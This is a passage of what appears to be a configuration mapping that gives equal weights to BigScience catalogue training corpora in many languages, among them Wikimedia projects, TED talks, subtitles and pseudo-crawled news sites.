"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_492_www_vivawoman_net": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_bengali_question_answering": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_244_www_df_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_scielo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_485_blog_moneysmart_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_488_dailyvanity_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_696_www_oercommons_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_483_alvinology_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_kompas": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-xh_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_odiencorp": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_habibi": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_pseudocrawl-filtered_672_pt_globalvoices_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_labr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_339_www_actasanitaria_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_563_ahotsak_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_tempo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_32_www_elexpresso_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indosum": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_91_www_diario26_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-rw_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_500_www_asiaone_com_singapore": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_pseudocrawl-filtered_530_www_mediapart_fr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_470_forums_hardwarezone_com_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_223_www_eltambor_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_jw300": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_219_www_aguasresiduales_info": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_376_www_elpopular_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_62_www_lapagina_com_sv": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_data_on_covid_19_news_coverage_in_vietnam": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_548_remezcla_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_499_www_today_com_news": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vntq_corpus_big": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_545_www_detik_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_637_www_argia_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_501_theindependent_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_430_www_eldiario_ec": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_420_www_retema_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_kalimat": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_487_thesmartlocal_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_153_financialfood_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_158_www_diariodeleon_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_pseudocrawl-filtered_599_fr_globalvoices_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_392_www_muypymes_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_506_goiena_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_231_ojo_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_167_www_ambientum_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vietnamese_poetry": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_118_www_elheraldo_hn": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_233_www_dinero_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_635_www_berria_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_395_www_evwind_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_182_correodelsur_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_56_www_eluniverso_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_250_www_cooperativa_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_374_www_talcualdigital_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-yo_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_315_lasillavacia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_207_elimpulso_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_276_radio_uchile_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_325_www_laprensa_hn": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_294_www_laopinion_com_co": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_34_www_losandes_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_90_peru_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_23_www_elconfidencialdigital_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_125_www_noticiasde_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_359_www_efeverde_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_381_www_cuartopoder_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_518_www_elcolombiano_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_280_salamancartvaldia_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_341_es_cointelegraph_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_165_www_ticbeat_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_641_es_globalvoices_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_209_misionesonline_net": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_246_www_eldiarionuevodia_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_86_www_motorpasion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_257_www_diaridetarragona_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_53_www_expreso_ec": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_367_elcorreoweb_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_159_www_postcrescent_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_422_www_formulatv_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_pseudocrawl-filtered_503_www_zaobao_com_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_638_globalvoices_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_78_www_listindiario_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_277_www_entornointeligente_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_404_www_telam_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_431_www_elperiodicoextremadura_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_254_diario_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_169_www_el_carabobeno_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_417_www_radiolaprimerisima_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_21_www_elperiodicodearagon_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_498_www_channelnewsasia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_304_www_semana_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_386_www_prensalibre_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_urdu-monolingual-corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_286_www_nacion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_67_www_elpais_cr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_405_www_emol_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_317_diariocorreo_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_512_kumparan_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_237_www_cronista_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_116_www_latribuna_hn": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonesian_news_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_172_www_rionegro_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_226_www_ole_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_287_www_cibercuba_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_572_tirto_id": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_157_www_elsoldemexico_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_44_ladiaria_com_uy": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_catalan_government_crawling": 1.,
